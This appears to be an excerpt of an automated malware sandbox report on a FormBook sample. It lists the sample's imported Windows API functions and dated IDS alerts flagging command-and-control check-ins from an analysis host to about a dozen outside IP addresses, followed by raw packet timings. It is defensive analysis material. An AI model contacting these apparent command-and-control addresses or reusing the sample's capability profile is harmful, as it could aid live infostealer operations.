COMCTL32.dll | ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll | SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll | SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-08T16:12:50.222180+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49736 | 188.114.96.3 | 80 | TCP
2025-01-08T16:12:50.222180+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49736 | 188.114.96.3 | 80 | TCP
2025-01-08T16:13:06.356572+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49737 | 23.167.152.41 | 80 | TCP
2025-01-08T16:13:08.901022+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49738 | 23.167.152.41 | 80 | TCP
2025-01-08T16:13:11.441722+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49739 | 23.167.152.41 | 80 | TCP
2025-01-08T16:13:13.987528+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49740 | 23.167.152.41 | 80 | TCP
2025-01-08T16:13:13.987528+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49740 | 23.167.152.41 | 80 | TCP
2025-01-08T16:13:19.609541+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49741 | 66.29.132.194 | 80 | TCP
2025-01-08T16:13:22.180861+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49742 | 66.29.132.194 | 80 | TCP
2025-01-08T16:13:24.849361+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49745 | 66.29.132.194 | 80 | TCP
2025-01-08T16:13:27.395483+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49761 | 66.29.132.194 | 80 | TCP
2025-01-08T16:13:27.395483+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49761 | 66.29.132.194 | 80 | TCP
2025-01-08T16:13:34.870994+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49803 | 202.92.5.23 | 80 | TCP
2025-01-08T16:13:37.453725+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49820 | 202.92.5.23 | 80 | TCP
2025-01-08T16:13:40.001405+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49838 | 202.92.5.23 | 80 | TCP
2025-01-08T16:13:42.553844+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49854 | 202.92.5.23 | 80 | TCP
2025-01-08T16:13:42.553844+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49854 | 202.92.5.23 | 80 | TCP
2025-01-08T16:13:48.248148+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49895 | 194.195.220.41 | 80 | TCP
2025-01-08T16:13:50.823965+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49911 | 194.195.220.41 | 80 | TCP
2025-01-08T16:13:53.346740+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49927 | 194.195.220.41 | 80 | TCP
2025-01-08T16:13:55.916392+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49946 | 194.195.220.41 | 80 | TCP
2025-01-08T16:13:55.916392+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49946 | 194.195.220.41 | 80 | TCP
2025-01-08T16:14:02.727959+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49981 | 103.230.159.86 | 80 | TCP
2025-01-08T16:14:05.236870+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49999 | 103.230.159.86 | 80 | TCP
2025-01-08T16:14:08.023489+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50016 | 103.230.159.86 | 80 | TCP
2025-01-08T16:14:10.348384+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50022 | 103.230.159.86 | 80 | TCP
2025-01-08T16:14:10.348384+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50022 | 103.230.159.86 | 80 | TCP
2025-01-08T16:14:16.027012+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50023 | 188.114.97.3 | 80 | TCP
2025-01-08T16:14:18.611002+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50024 | 188.114.97.3 | 80 | TCP
2025-01-08T16:14:21.387697+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50025 | 188.114.97.3 | 80 | TCP
2025-01-08T16:14:24.016119+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50026 | 188.114.97.3 | 80 | TCP
2025-01-08T16:14:24.016119+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50026 | 188.114.97.3 | 80 | TCP
2025-01-08T16:14:30.383853+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50027 | 118.107.250.103 | 80 | TCP
2025-01-08T16:14:32.991448+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50028 | 118.107.250.103 | 80 | TCP
2025-01-08T16:14:35.548903+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50029 | 118.107.250.103 | 80 | TCP
2025-01-08T16:14:38.111978+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50030 | 118.107.250.103 | 80 | TCP
2025-01-08T16:14:38.111978+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50030 | 118.107.250.103 | 80 | TCP
2025-01-08T16:14:43.777584+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50031 | 209.74.77.109 | 80 | TCP
2025-01-08T16:14:46.301778+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50032 | 209.74.77.109 | 80 | TCP
2025-01-08T16:14:48.865463+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50033 | 209.74.77.109 | 80 | TCP
2025-01-08T16:14:51.423596+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50034 | 209.74.77.109 | 80 | TCP
2025-01-08T16:14:51.423596+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50034 | 209.74.77.109 | 80 | TCP
2025-01-08T16:14:57.187963+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50035 | 188.114.96.3 | 80 | TCP
2025-01-08T16:14:59.749418+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50036 | 188.114.96.3 | 80 | TCP
2025-01-08T16:15:02.354360+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50037 | 188.114.96.3 | 80 | TCP
2025-01-08T16:15:04.892532+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50038 | 188.114.96.3 | 80 | TCP
2025-01-08T16:15:04.892532+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50038 | 188.114.96.3 | 80 | TCP
2025-01-08T16:15:10.618642+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50039 | 194.245.148.189 | 80 | TCP
2025-01-08T16:15:13.142928+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50040 | 194.245.148.189 | 80 | TCP
2025-01-08T16:15:15.775249+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50041 | 194.245.148.189 | 80 | TCP
2025-01-08T16:15:18.236252+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50042 | 194.245.148.189 | 80 | TCP
2025-01-08T16:15:18.236252+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50042 | 194.245.148.189 | 80 | TCP
2025-01-08T16:15:23.845041+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50043 | 199.59.243.228 | 80 | TCP
2025-01-08T16:15:26.403999+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50044 | 199.59.243.228 | 80 | TCP
2025-01-08T16:15:28.949228+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50045 | 199.59.243.228 | 80 | TCP
2025-01-08T16:15:31.561801+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50046 | 199.59.243.228 | 80 | TCP
2025-01-08T16:15:31.561801+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50046 | 199.59.243.228 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                      Jan 8, 2025 16:13:11.101738930 CET804973923.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:11.101749897 CET804973923.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:11.101771116 CET804973923.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:11.101782084 CET804973923.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:11.101793051 CET804973923.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:11.101933002 CET804973923.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:11.101943016 CET804973923.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:11.101996899 CET804973923.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:11.102006912 CET804973923.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:11.441632032 CET804973923.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:11.441721916 CET4973980192.168.2.423.167.152.41
                                                                      Jan 8, 2025 16:13:12.604964018 CET4973980192.168.2.423.167.152.41
                                                                      Jan 8, 2025 16:13:12.610194921 CET804973923.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:13.623488903 CET4974080192.168.2.423.167.152.41
                                                                      Jan 8, 2025 16:13:13.628542900 CET804974023.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:13.628669024 CET4974080192.168.2.423.167.152.41
                                                                      Jan 8, 2025 16:13:13.637958050 CET4974080192.168.2.423.167.152.41
                                                                      Jan 8, 2025 16:13:13.642707109 CET804974023.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:13.987257957 CET804974023.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:13.987528086 CET4974080192.168.2.423.167.152.41
                                                                      Jan 8, 2025 16:13:13.988405943 CET4974080192.168.2.423.167.152.41
                                                                      Jan 8, 2025 16:13:13.993149042 CET804974023.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:19.013520002 CET4974180192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:19.018307924 CET804974166.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:19.018379927 CET4974180192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:19.033127069 CET4974180192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:19.037853956 CET804974166.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:19.609467030 CET804974166.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:19.609481096 CET804974166.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:19.609491110 CET804974166.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:19.609503984 CET804974166.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:19.609514952 CET804974166.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:19.609524965 CET804974166.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:19.609540939 CET4974180192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:19.609581947 CET4974180192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:20.542574883 CET4974180192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:21.560997009 CET4974280192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:21.565926075 CET804974266.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:21.566025019 CET4974280192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:21.579884052 CET4974280192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:21.584623098 CET804974266.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:22.180773020 CET804974266.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:22.180787086 CET804974266.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:22.180795908 CET804974266.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:22.180807114 CET804974266.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:22.180825949 CET804974266.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:22.180835962 CET804974266.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:22.180860996 CET4974280192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:22.180901051 CET4974280192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:23.089318037 CET4974280192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:24.108011961 CET4974580192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:24.112946033 CET804974566.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:24.113034964 CET4974580192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:24.128179073 CET4974580192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:24.133426905 CET804974566.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:24.133440971 CET804974566.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:24.133450031 CET804974566.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:24.133460045 CET804974566.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:24.133471966 CET804974566.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:24.133485079 CET804974566.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:24.133493900 CET804974566.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:24.133502007 CET804974566.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:24.133511066 CET804974566.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:24.849272013 CET804974566.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:24.849287987 CET804974566.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:24.849298954 CET804974566.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:24.849308968 CET804974566.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:24.849328995 CET804974566.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:24.849339962 CET804974566.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:24.849360943 CET4974580192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:24.849406004 CET4974580192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:25.636679888 CET4974580192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:26.654913902 CET4976180192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:26.659848928 CET804976166.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:26.659941912 CET4976180192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:26.669754982 CET4976180192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:26.674504995 CET804976166.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:27.395282030 CET804976166.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:27.395308018 CET804976166.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:27.395334005 CET804976166.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:27.395347118 CET804976166.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:27.395409107 CET804976166.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:27.395431995 CET804976166.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:27.395445108 CET804976166.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:27.395457029 CET804976166.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:27.395469904 CET804976166.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:27.395483971 CET804976166.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:27.395483017 CET4976180192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:27.395514965 CET4976180192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:27.395534992 CET4976180192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:27.395744085 CET804976166.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:27.395787954 CET4976180192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:27.399950981 CET4976180192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:27.405631065 CET804976166.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:33.934190035 CET4980380192.168.2.4202.92.5.23
                                                                      Jan 8, 2025 16:13:33.938996077 CET8049803202.92.5.23192.168.2.4
                                                                      Jan 8, 2025 16:13:33.939208984 CET4980380192.168.2.4202.92.5.23
                                                                      Jan 8, 2025 16:13:33.954086065 CET4980380192.168.2.4202.92.5.23
                                                                      Jan 8, 2025 16:13:33.958905935 CET8049803202.92.5.23192.168.2.4
                                                                      Jan 8, 2025 16:13:34.870903969 CET8049803202.92.5.23192.168.2.4
                                                                      Jan 8, 2025 16:13:34.870913982 CET8049803202.92.5.23192.168.2.4
                                                                      Jan 8, 2025 16:13:34.870924950 CET8049803202.92.5.23192.168.2.4
                                                                      Jan 8, 2025 16:13:34.870994091 CET4980380192.168.2.4202.92.5.23
                                                                      Jan 8, 2025 16:13:34.870994091 CET4980380192.168.2.4202.92.5.23
                                                                      Jan 8, 2025 16:13:35.464437008 CET4980380192.168.2.4202.92.5.23
                                                                      Jan 8, 2025 16:13:36.485594034 CET4982080192.168.2.4202.92.5.23
                                                                      Jan 8, 2025 16:13:36.490447998 CET8049820202.92.5.23192.168.2.4
                                                                      Jan 8, 2025 16:13:36.490647078 CET4982080192.168.2.4202.92.5.23
                                                                      Jan 8, 2025 16:13:36.506620884 CET4982080192.168.2.4202.92.5.23
                                                                      Jan 8, 2025 16:13:36.511425018 CET8049820202.92.5.23192.168.2.4
                                                                      Jan 8, 2025 16:13:37.453592062 CET8049820202.92.5.23192.168.2.4
                                                                      Jan 8, 2025 16:13:37.453607082 CET8049820202.92.5.23192.168.2.4
